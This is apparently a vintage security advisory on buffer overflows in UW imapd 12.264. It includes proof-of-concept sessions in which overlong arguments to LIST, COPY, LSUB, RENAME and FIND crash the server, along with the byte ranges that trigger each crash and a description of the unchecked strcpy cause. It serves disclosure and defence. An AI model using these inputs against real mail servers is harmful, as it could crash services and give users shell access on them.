COMMAND

    imapd

SYSTEMS AFFECTED

    imapd4r1 v12.264 (imap-4.7 package from the University of Washington, UW)

PROBLEM

    Michal Zalewski found the following on the newest Red Hat release:

        OK nimue IMAP4rev1 v12.264 server ready
        1 login lcamtuf test
        1 OK LOGIN completed
        1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]
        Program received signal SIGSEGV, Segmentation fault.
        0x41414141 in ?? ()

    Privileges seem to be dropped before the overflow is reached, but it
    is still a convenient way to get shell access as the user owning the
    mail account, or to grab data from the process memory.  Both the imap
    and ipopd packages are believed to need a code security audit.

    To trigger the segfault the number of A's has to be in  the  range
    1023 < #A < 8180.  The upper bound comes from the input line limit:
    if the command line including CR/LF is longer than 8192 bytes,  the
    server rejects it with an error message instead.  The segfaults are
    in the nntp, mh, news and dummy drivers.  In all of these modules the
    subroutine <name>_canonicalize will happily strcpy()  and  strcat()
    the user-supplied arguments into fixed-size buffers, normally
    MAILTMPLEN = 1024 bytes, with no length check.  The older imap-4.5-4
    seems to be OK.

    Here is another buffer overflow in imapd.  This time the flaw is in
    the standard COPY command (RFC 1064):

        OK mail IMAP4rev1 v12.264 server ready
        login siva9 secret
        OK LOGIN completed
        select inbox
        2 EXISTS
        0 RECENT
        OK [UIDVALIDITY 956162550] UID validity status
        OK [UIDNEXT 5] Predicted next UID
        FLAGS (\Answered \Flagged \Deleted \Draft \Seen)
        OK [PERMANENTFLAGS (\* \Answered \Flagged \Deleted \Draft \Seen)] Permanent
        flags
        OK [UNSEEN 2] first unseen message in /var/spool/mail/siva9
        OK [READ-WRITE] SELECT completed
        copy 1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... [a lot of A's]

    There is no answer: the process has been killed by SIGSEGV.  The
    number of A's must be in the range from 1017 to 8180.  A valid
    mailbox login is required, and after LOGIN all privileges are
    dropped, but this still gives unprivileged shell access as the mail
    user.  This was tested against UW imapd v10.223, v11.241, v12.250,
    v12.261 and v12.264.

    Here come three more buffer overruns.  This time the affected
    commands are LSUB, RENAME and FIND:

        OK mail IMAP4rev1 v12.264 server ready
        login siva9 secret
        OK LOGIN completed
        lsub "" AAAAAAAAAAAAA.... (#A 1024 - 8179)

        SIGSEGV received.

        OK localhost IMAP4rev1 v12.264 server ready
        login siva9 secret
        OK LOGIN completed
        rename inbox AAAAAAAAAAAAA.... (#A 1021 - 8174)

        SIGSEGV received.

        OK localhost IMAP4rev1 v12.264 server ready
        login siva9 secret
        OK LOGIN completed
        find all.mailboxes AAAAAAAAAAAAA.... (#A 1026 - 8168)

        SIGSEGV received.

    It seems that all two-argument commands in the authenticated state
    whose second argument is a string are vulnerable.  ipop2d/ipop3d
    work fine in all states, including the transaction state.

SOLUTION

    1) Deinstall the imap-uw port/package, if you have installed it.
    2) If you do not specifically require IMAP functionality (i.e.
       POP2/POP3 is sufficient), disable the imap daemon in
       /etc/inetd.conf and restart inetd (e.g. with the command
       'killall -HUP inetd').

    Unfortunately the vulnerabilities in imapd are quite extensive and
    no patch is  currently available to  address them.   There is also
    no  "drop-in"  replacement  for  imap-uw  currently  available  in
    ports, although the mail/cyrus  port is another imap  server which
    may be a suitable replacement.  Cyrus has different  configuration
    and operational requirements than imap-uw however, which may  make
    it unsuitable for many users.

    Until a security audit of the imap-uw source can be completed  and
    the vulnerabilities patched, it  is recommended that operators  of
    "closed" imapd servers (where every user already has a mailbox login)
    take steps to minimize the impact of users being able to run  code
    on the server, i.e. by tightening the local security on the machine
    to minimize the damage an intruding user can cause.